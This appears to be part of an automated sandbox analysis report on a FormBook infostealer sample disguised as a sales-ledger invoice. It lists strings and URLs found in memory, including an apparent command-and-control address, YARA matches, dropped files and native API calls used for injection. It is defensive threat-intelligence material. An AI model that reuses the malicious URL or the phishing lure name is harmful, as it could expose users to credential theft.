Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/fi
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/5i
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Pi
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/fi
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.242943283.0000000005863000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/q
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/q
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.242943283.0000000005863000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/s20
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehpLMEM
Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehpc
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000003.390090022.00000000030FD000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp.
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh
Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpj
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/ocid=iehp
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp String found in binary or memory: http://www.newtonsoft.com/jsonschema
Source: AdvancedRun.exe, AdvancedRun.exe, 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000015.00000000.299126160.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.dr String found in binary or memory: http://www.nirsoft.net/
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000019.00000002.497484764.00000000061E3000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.484792584.0000000005349000.00000004.00000001.sdmp String found in binary or memory: http://www.seniorlivingcaelderly.com
Source: explorer.exe, 00000019.00000002.497484764.00000000061E3000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.484792584.0000000005349000.00000004.00000001.sdmp String found in binary or memory: http://www.seniorlivingcaelderly.com/suod/
Source: explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000016.00000003.399833270.0000000005A8D000.00000004.00000001.sdmp String found in binary or memory: https://go.micro
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr String found in binary or memory: https://sectigo.com/CPS0C
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr String found in binary or memory: https://sectigo.com/CPS0D
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/4
Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/5
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0
Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=05

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Detected FormBook malware
Source: C:\Windows\SysWOW64\cmmon32.exe Dropped file: C:\Users\user\AppData\Roaming\28L0N9-0\28Llogri.ini Jump to dropped file
Source: C:\Windows\SysWOW64\cmmon32.exe Dropped file: C:\Users\user\AppData\Roaming\28L0N9-0\28Llogrv.ini Jump to dropped file
Malicious sample detected (through community Yara rule)
Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041A070 NtClose, 24_2_0041A070
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041A120 NtAllocateVirtualMemory, 24_2_0041A120
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_00419F40 NtCreateFile, 24_2_00419F40
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_00419FF0 NtReadFile, 24_2_00419FF0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041A06C NtClose, 24_2_0041A06C
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041A11A NtAllocateVirtualMemory, 24_2_0041A11A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239910 NtAdjustPrivilegesToken,LdrInitializeThunk, 24_2_01239910
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012399A0 NtCreateSection,LdrInitializeThunk, 24_2_012399A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239860 NtQuerySystemInformation,LdrInitializeThunk, 24_2_01239860
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239840 NtDelayExecution,LdrInitializeThunk, 24_2_01239840
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012398F0 NtReadVirtualMemory,LdrInitializeThunk, 24_2_012398F0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239A20 NtResumeThread,LdrInitializeThunk, 24_2_01239A20
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239A00 NtProtectVirtualMemory,LdrInitializeThunk, 24_2_01239A00
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239A50 NtCreateFile,LdrInitializeThunk, 24_2_01239A50
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239540 NtReadFile,LdrInitializeThunk, 24_2_01239540
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012395D0 NtClose,LdrInitializeThunk, 24_2_012395D0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239710 NtQueryInformationToken,LdrInitializeThunk, 24_2_01239710
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012397A0 NtUnmapViewOfSection,LdrInitializeThunk, 24_2_012397A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239780 NtMapViewOfSection,LdrInitializeThunk, 24_2_01239780
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239660 NtAllocateVirtualMemory,LdrInitializeThunk, 24_2_01239660
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012396E0 NtFreeVirtualMemory,LdrInitializeThunk, 24_2_012396E0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239950 NtQueueApcThread, 24_2_01239950
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012399D0 NtCreateProcessEx, 24_2_012399D0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239820 NtEnumerateKey, 24_2_01239820
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0123B040 NtSuspendThread, 24_2_0123B040
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012398A0 NtWriteVirtualMemory, 24_2_012398A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239B00 NtSetValueKey, 24_2_01239B00
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0123A3B0 NtGetContextThread, 24_2_0123A3B0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239A10 NtQuerySection, 24_2_01239A10
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239A80 NtOpenDirectoryObject, 24_2_01239A80
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239520 NtWaitForSingleObject, 24_2_01239520
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0123AD30 NtSetContextThread, 24_2_0123AD30
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239560 NtWriteFile, 24_2_01239560
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012395F0 NtQueryInformationFile, 24_2_012395F0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239730 NtQueryVirtualMemory, 24_2_01239730
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0123A710 NtOpenProcessToken, 24_2_0123A710
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239760 NtOpenProcess, 24_2_01239760
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0123A770 NtOpenThread, 24_2_0123A770
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239770 NtSetInformationFile, 24_2_01239770
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239FE0 NtCreateMutant, 24_2_01239FE0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239610 NtEnumerateValueKey, 24_2_01239610
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239670 NtQueryInformationProcess, 24_2_01239670
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239650 NtQueryValueKey, 24_2_01239650
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012396D0 NtCreateKey, 24_2_012396D0
Source: C:\Windows\explorer.exe Code function: 25_2_061C5A72 NtCreateFile,NtReadFile,NtClose, 25_2_061C5A72
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D095D0 NtClose,LdrInitializeThunk, 32_2_04D095D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09540 NtReadFile,LdrInitializeThunk, 32_2_04D09540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09560 NtWriteFile,LdrInitializeThunk, 32_2_04D09560
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D096D0 NtCreateKey,LdrInitializeThunk, 32_2_04D096D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D096E0 NtFreeVirtualMemory,LdrInitializeThunk, 32_2_04D096E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09650 NtQueryValueKey,LdrInitializeThunk, 32_2_04D09650
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09660 NtAllocateVirtualMemory,LdrInitializeThunk, 32_2_04D09660
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09610 NtEnumerateValueKey,LdrInitializeThunk, 32_2_04D09610
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09FE0 NtCreateMutant,LdrInitializeThunk, 32_2_04D09FE0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09780 NtMapViewOfSection,LdrInitializeThunk, 32_2_04D09780
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09770 NtSetInformationFile,LdrInitializeThunk, 32_2_04D09770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09710 NtQueryInformationToken,LdrInitializeThunk, 32_2_04D09710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09840 NtDelayExecution,LdrInitializeThunk, 32_2_04D09840
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09860 NtQuerySystemInformation,LdrInitializeThunk, 32_2_04D09860
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D099A0 NtCreateSection,LdrInitializeThunk, 32_2_04D099A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09910 NtAdjustPrivilegesToken,LdrInitializeThunk, 32_2_04D09910
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09A50 NtCreateFile,LdrInitializeThunk, 32_2_04D09A50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D095F0 NtQueryInformationFile, 32_2_04D095F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D0AD30 NtSetContextThread, 32_2_04D0AD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09520 NtWaitForSingleObject, 32_2_04D09520
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09670 NtQueryInformationProcess, 32_2_04D09670
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D097A0 NtUnmapViewOfSection, 32_2_04D097A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D0A770 NtOpenThread, 32_2_04D0A770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09760 NtOpenProcess, 32_2_04D09760
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D0A710 NtOpenProcessToken, 32_2_04D0A710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09730 NtQueryVirtualMemory, 32_2_04D09730
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D098F0 NtReadVirtualMemory, 32_2_04D098F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D098A0 NtWriteVirtualMemory, 32_2_04D098A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D0B040 NtSuspendThread, 32_2_04D0B040
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09820 NtEnumerateKey, 32_2_04D09820
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D099D0 NtCreateProcessEx, 32_2_04D099D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09950 NtQueueApcThread, 32_2_04D09950
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09A80 NtOpenDirectoryObject, 32_2_04D09A80
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09A10 NtQuerySection, 32_2_04D09A10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09A00 NtProtectVirtualMemory, 32_2_04D09A00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09A20 NtResumeThread, 32_2_04D09A20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D0A3B0 NtGetContextThread, 32_2_04D0A3B0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09B00 NtSetValueKey, 32_2_04D09B00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2A070 NtClose, 32_2_02B2A070
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2A120 NtAllocateVirtualMemory, 32_2_02B2A120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B29FF0 NtReadFile, 32_2_02B29FF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B29F40 NtCreateFile, 32_2_02B29F40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2A06C NtClose, 32_2_02B2A06C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2A11A NtAllocateVirtualMemory, 32_2_02B2A11A
Detected potential crypto function
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_0057A5EC 0_2_0057A5EC
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_01060640 0_2_01060640
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_010609AE 0_2_010609AE
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_01061748 0_2_01061748
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_01061BE0 0_2_01061BE0
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_010617F9 0_2_010617F9
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_04E200B8 0_2_04E200B8
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_04E20E60 0_2_04E20E60
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_04E20E70 0_2_04E20E70
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_00401030 24_2_00401030
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041D905 24_2_0041D905
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041EB37 24_2_0041EB37
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041E3A2 24_2_0041E3A2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041E41B 24_2_0041E41B
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041D4D0 24_2_0041D4D0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041DCBC 24_2_0041DCBC
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_00402D90 24_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_00409E40 24_2_00409E40
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_00409E3E 24_2_00409E3E
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041DF3F 24_2_0041DF3F
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041DFCD 24_2_0041DFCD
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_00402FB0 24_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0078A5EC 24_2_0078A5EC
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01214120 24_2_01214120
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FF900 24_2_011FF900
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012CE824 24_2_012CE824
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B1002 24_2_012B1002
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012220A0 24_2_012220A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C20A8 24_2_012C20A8
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120B090 24_2_0120B090
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C28EC 24_2_012C28EC
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C2B28 24_2_012C2B28
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121AB40 24_2_0121AB40
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122EBB0 24_2_0122EBB0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B03DA 24_2_012B03DA
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BDBD2 24_2_012BDBD2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012AFA2B 24_2_012AFA2B
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C22AE 24_2_012C22AE
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C2D07 24_2_012C2D07
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F0D20 24_2_011F0D20
